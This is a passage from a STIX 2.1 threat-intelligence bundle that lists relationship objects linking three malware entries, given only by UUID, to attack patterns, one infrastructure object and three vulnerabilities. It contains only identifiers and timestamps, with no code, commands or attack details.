"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--07b009cd-e86d-58e4-9f0c-258856391a2d", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.937837Z", "modified": "2026-06-16T16:01:05.937837Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--9b061dc5-a41f-538c-9521-8e98984351d2", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--bddb56ef-9abe-5116-bdb4-daeea5e96487", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.937953Z", "modified": "2026-06-16T16:01:05.937953Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--e5cb41d1-15ac-5c86-bb7b-64f8f3e980ed", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--edff136e-d09e-53a7-bf00-5ef707146a3a", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.938049Z", "modified": "2026-06-16T16:01:05.938049Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--cf20d2c8-8603-5de7-9ff7-6907e88212b9", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--56427d0d-5ea9-52e9-aedb-d1c39c337fce", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.938146Z", "modified": "2026-06-16T16:01:05.938146Z", "relationship_type": "communicates-with", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "infrastructure--214ad0bb-f57a-5827-96bd-39f62c91516a", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--777b5b8e-e6a3-5fc2-99a7-aa5a52fa15d5", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.938244Z", "modified": "2026-06-16T16:01:05.938244Z", "relationship_type": "exploits", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "vulnerability--33d26914-f594-5da5-a6e5-24b04ab9a05c", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--7ae4cc80-9178-5d7d-a98e-0c222c4297d5", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.93834Z", "modified": "2026-06-16T16:01:05.93834Z", "relationship_type": "exploits", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "vulnerability--a6691a02-8776-5d2e-b9b0-50d95ffd1dce", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--1b7b0ee7-3285-50c8-b268-bd77b206153b", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.938438Z", "modified": "2026-06-16T16:01:05.938438Z", "relationship_type": "exploits", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "vulnerability--4d56e7a3-38a5-5c89-a858-26018e1d0119", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--b0e4774b-0e42-5604-b956-e7f586fbb8d7", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.938533Z", "modified": "2026-06-16T16:01:05.938533Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--5b7a06ed-32c6-5260-95a8-8e82d3f41f1f", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--f0a881fa-caeb-5d31-8e69-f45f6461f9c0", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.938636Z", "modified": "2026-06-16T16:01:05.938636Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--dc18c976-0434-597c-bbcd-79a7131f6aca", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--a83bbf4e-1005-573c-a108-fe8eb3709ae6", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.938733Z", "modified": "2026-06-16T16:01:05.938733Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--05023500-1905-50d5-af07-f1896a464314", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--d578966e-3496-5af8-8ef4-0a1f32fc5f08", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.938828Z", "modified": "2026-06-16T16:01:05.938828Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--9800866f-1d8d-5f89-bfaa-67bcfdd6fdb6", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--e236067a-4482-54fd-ae1e-cc58bf18715f", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.938922Z", "modified": "2026-06-16T16:01:05.938922Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--87b8e72a-5437-59a8-a6a9-16f846415a26", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--bcd149e4-c3e5-5965-83ce-e35a6c402c52", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.939019Z", "modified": "2026-06-16T16:01:05.939019Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--6214841b-936d-5da2-b5c8-4bed4cf9aee0", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--bd130291-7e14-5cda-b4ac-e0f4c8938c90", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.939114Z", "modified": "2026-06-16T16:01:05.939114Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--4efef37e-c256-5987-a1b8-60d9424c7250", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--fb1dd2cd-2b20-5f31-8bb6-a8361f7b695a", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.939209Z", "modified": "2026-06-16T16:01:05.939209Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--770465f6-d1b8-5285-9c27-a5a9569aa97b", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--ef373377-2335-51d2-9bb9-eecd64ad7697", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.939303Z", "modified": "2026-06-16T16:01:05.939303Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--99faa775-7366-5b35-9527-17f7643bc506", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--94f9e084-2508-5507-b5c7-a5ba6416ccaa", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.939398Z", "modified": "2026-06-16T16:01:05.939398Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--73364e03-8914-541e-a33c-877b656c37e4", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--1b40fc6f-3465-5cae-8068-098a9406514f", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.939492Z", "modified": "2026-06-16T16:01:05.939492Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--c1d497a1-fd18-5b75-9bd4-65dcf03ad8e2", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--25f0d18f-5251-59ee-bd1f-a4655b79cc7b", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.939586Z", "modified": "2026-06-16T16:01:05.939586Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--a42fc6ae-4096-53e5-98d2-02c39a64d42c", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--4c539f4b-de9f-5372-95f0-69d9a3cffee6", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.939681Z", "modified": "2026-06-16T16:01:05.939681Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--d2f1c4d6-c47e-5a04-a3fd-c736a48f01f1", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--e5156cf0-6473-58a8-b804-062c3bc2ca4a", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.939775Z", "modified": "2026-06-16T16:01:05.939775Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--ef3ac7d9-a40e-539b-9435-17e7305a5bb8", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--12f22361-d45e-57e8-bde5-ce9fdd3daaa7", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.939869Z", "modified": "2026-06-16T16:01:05.939869Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--1635f86c-b5b5-5339-b31b-87ce05013408", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--d5816fbb-0cda-547b-99b7-a9a15af16e7d", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.939965Z", "modified": "2026-06-16T16:01:05.939965Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--d09ec016-9d07-5880-bbaa-b9dc297f2995", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--24567532-262d-565c-a25c-b341ec79ab5c", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.940067Z", "modified": "2026-06-16T16:01:05.940067Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--bef03fde-2eb8-5ba7-96bc-f6fe262d857c", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--40e5ce04-c0ba-55b1-bee1-cb89d4078c71", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.94017Z", "modified": "2026-06-16T16:01:05.94017Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--0e5a3749-a144-57b8-a774-20335f3f0941", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--91bada52-5b92-5ef4-81e6-929e2fabf56f", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.940266Z", "modified": "2026-06-16T16:01:05.940266Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--115d7bc5-0c5a-58b6-9a22-417821aa315c", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--b34cea2a-0558-5bee-a6c9-0e983f14aa28", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.940361Z", "modified": "2026-06-16T16:01:05.940361Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--f38353ba-cfac-577c-ac86-5e3f0c5fb314", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--bc2dcf0a-66b3-589d-8114-922fccf05f93", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.940456Z", "modified": "2026-06-16T16:01:05.940456Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--3e0f1033-d731-5b8e-8f4c-27484d52e4f0", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--a3f7c8b4-e6f2-5452-baf6-c0d6d84383a5", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.94055Z", "modified": "2026-06-16T16:01:05.94055Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--74662a48-2fba-53a9-8582-008044ccd9d9", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--741a8240-7583-5199-aa94-f5fb7e6bb389", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.940645Z", "modified": "2026-06-16T16:01:05.940645Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--ae605b9d-aec8-5001-87c6-c60e0a234712", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--d9a3fa93-fba1-540b-ab3a-b88cea227681", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.940741Z", "modified": "2026-06-16T16:01:05.940741Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--67cee5b2-7970-5505-949d-f0b9a6c1c4bf", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--57f62990-79e4-58aa-9760-7178618406f7", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.940835Z", "modified": "2026-06-16T16:01:05.940835Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--a0baf777-47e7-57bb-a5f8-ffa4f9a1dbe8", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--3105be12-ff41-5667-b445-143f37118cd7", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.94093Z", "modified": "2026-06-16T16:01:05.94093Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--b12dc527-38bd-5e3a-a077-afa4290df40b", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--93784f09-f247-5b6b-8511-6d3e009e36dd", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.941024Z", "modified": "2026-06-16T16:01:05.941024Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--fc3ef2f7-136f-551c-b37b-ebe6208fb232", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--f5007f4e-25be-586c-8dbe-a62fb281a77a", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.94116Z", "modified": "2026-06-16T16:01:05.94116Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--adcf66b3-4abb-593f-a779-d41175990400", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--41c82927-9195-54fd-93c4-ecca1a3639ab", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.941283Z", "modified": "2026-06-16T16:01:05.941283Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--e143cf40-c9b0-5118-8096-34d60698c27b", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--71ccaff2-a988-571e-a7f7-32dafb821b5f", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.941389Z", "modified": "2026-06-16T16:01:05.941389Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--1076c468-8982-548b-9292-726a22f83ecb", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--9c274bcb-3ef3-584b-9a94-60288602469e", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.941494Z", "modified": "2026-06-16T16:01:05.941494Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--d6b8aa8c-cfd9-5f42-a8ac-2573005abb2f", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--bd66fe0f-83e9-5ee7-b2a6-3bf02954b685", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.941675Z", "modified": "2026-06-16T16:01:05.941675Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--e42939d6-6332-5a6c-8dac-6195c79081bc", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--c80e23bc-6dbb-5ad2-9002-2ea1510fbbac", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.941771Z", "modified": "2026-06-16T16:01:05.941771Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--b1f2e4be-8bd7-50f4-9b12-8ff5a814d239", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--1aa12f5d-c68f-5fb4-aa78-c7a75c7ea968", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.941866Z", "modified": "2026-06-16T16:01:05.941866Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--030bfe25-492a-5e3f-aad5-1c799345aa06", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--95eefd3c-8d34-5a33-a46d-44559b91dc98", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.941961Z", "modified": "2026-06-16T16:01:05.941961Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--88e2313f-cf2a-59dc-8124-88e46e53b1c4", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--fda7f067-128d-5283-90ea-17a2dbbed29c", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.942076Z", "modified": "2026-06-16T16:01:05.942076Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--8bd25a7b-1b65-5b61-9080-4b05d2ce7541", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--15692a3e-aa6a-5f0e-b58f-493eb0e93f7b", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.942198Z", "modified": "2026-06-16T16:01:05.942198Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--ab386774-9556-5bc2-8927-6d98193000ec", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--b52f5b8e-e4bb-5670-b310-e1378da1f655", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.942306Z", "modified": "2026-06-16T16:01:05.942306Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--06cbe52b-abcb-5b54-a3ec-c553a82c7374", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--0cc2d3d4-482f-5c72-9e96-0798e5aa902f", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.942423Z", "modified": "2026-06-16T16:01:05.942423Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--9b061dc5-a41f-538c-9521-8e98984351d2", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--85d88658-cba3-5fca-a16b-87dc730a5fb2", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.942541Z", "modified": "2026-06-16T16:01:05.942541Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--e5cb41d1-15ac-5c86-bb7b-64f8f3e980ed", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--c68acf25-3948-5f0b-85a7-93762034b84b", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.942661Z", "modified": "2026-06-16T16:01:05.942661Z", "relationship_type": "uses", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "attack-pattern--cf20d2c8-8603-5de7-9ff7-6907e88212b9", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--e0e45ffa-c649-5381-8b0b-53b95e75819d", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.942807Z", "modified": "2026-06-16T16:01:05.942807Z", "relationship_type": "communicates-with", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "infrastructure--214ad0bb-f57a-5827-96bd-39f62c91516a", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--ea183149-175a-5b8d-83d1-a69f917e4da6", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.942919Z", "modified": "2026-06-16T16:01:05.942919Z", "relationship_type": "exploits", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "vulnerability--33d26914-f594-5da5-a6e5-24b04ab9a05c", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--20dae6dc-cbb0-5695-9a5a-569389e771ca", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.943058Z", "modified": "2026-06-16T16:01:05.943058Z", "relationship_type": "exploits", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "vulnerability--a6691a02-8776-5d2e-b9b0-50d95ffd1dce", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--f7e9ccbc-3af7-5909-a862-1ba85e9ec5dc", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.943203Z", "modified": "2026-06-16T16:01:05.943203Z", "relationship_type": "exploits", "source_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "target_ref": "vulnerability--4d56e7a3-38a5-5c89-a858-26018e1d0119", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--88c2084c-caf3-5805-97f6-ab0f466bd7f0", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.943348Z", "modified": "2026-06-16T16:01:05.943348Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--5b7a06ed-32c6-5260-95a8-8e82d3f41f1f", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--1be4b2f6-d8d2-54ec-8b24-553ea4a859f8", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.943471Z", "modified": "2026-06-16T16:01:05.943471Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--dc18c976-0434-597c-bbcd-79a7131f6aca", "object_marking_refs": [ 